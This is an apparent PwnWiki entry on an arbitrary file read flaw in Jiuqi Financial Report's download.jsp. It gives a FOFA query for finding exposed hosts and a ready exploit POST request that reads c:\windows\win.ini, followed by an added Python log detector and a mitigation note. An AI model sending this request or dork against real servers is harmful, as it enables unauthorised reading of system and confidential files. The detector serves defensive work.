Jiuqi Financial Report (久其財務報表) download.jsp Arbitrary File Read Vulnerability
From PwnWiki
FOFA
body="/netrep/"
Exploitation
Send the following request:
POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host:
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.251.113.53:7002
Content-Type: application/x-www-form-urlencoded

jpgfilepath=c:\windows\win.ini
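
For detection, the request above can be matched in proxy or WAF logs by its endpoint and its jpgfilepath parameter. The following is an added example, not code from PwnWiki or the vendor; it assumes legitimate jpgfilepath values are relative paths, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter name are taken from the request on this page.
ENDPOINT = "/netrep/ebook/browse/download.jsp"
PARAM = "jpgfilepath"

# Assumption: legitimate values are relative paths without "..", so a drive
# letter, a leading slash/backslash (incl. UNC) or a ".." segment is flagged.
ABSOLUTE = re.compile(r"^(?:[a-zA-Z]:|[\\/])")
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded paths are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_values(target, body=""):
    """Return decoded jpgfilepath values that point outside a relative path."""
    route, _, query = target.partition("?")
    if route.lower() != ENDPOINT:
        return []
    hits = []
    for source in (query, body):  # parameter may arrive in either place
        for raw in parse_qs(source, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw).strip()
            if ABSOLUTE.match(value) or TRAVERSAL.search(value):
                hits.append(value)
    return hits


# Constructed sample records: (request target, form body).
SAMPLE = [
    (ENDPOINT, r"jpgfilepath=c:\windows\win.ini"),
    (ENDPOINT, "jpgfilepath=c%253A%255Cwindows%255Cwin.ini"),
    (ENDPOINT, "jpgfilepath=2021/q1/page1.jpg"),
    ("/netrep/index.jsp", r"jpgfilepath=c:\windows\win.ini"),
]

if __name__ == "__main__":
    for target, body in SAMPLE:
        print(target, body, "->", suspicious_values(target, body) or "ok")
```

The same absolute-path and ".." checks, applied server-side before the file is opened, are the corresponding mitigation.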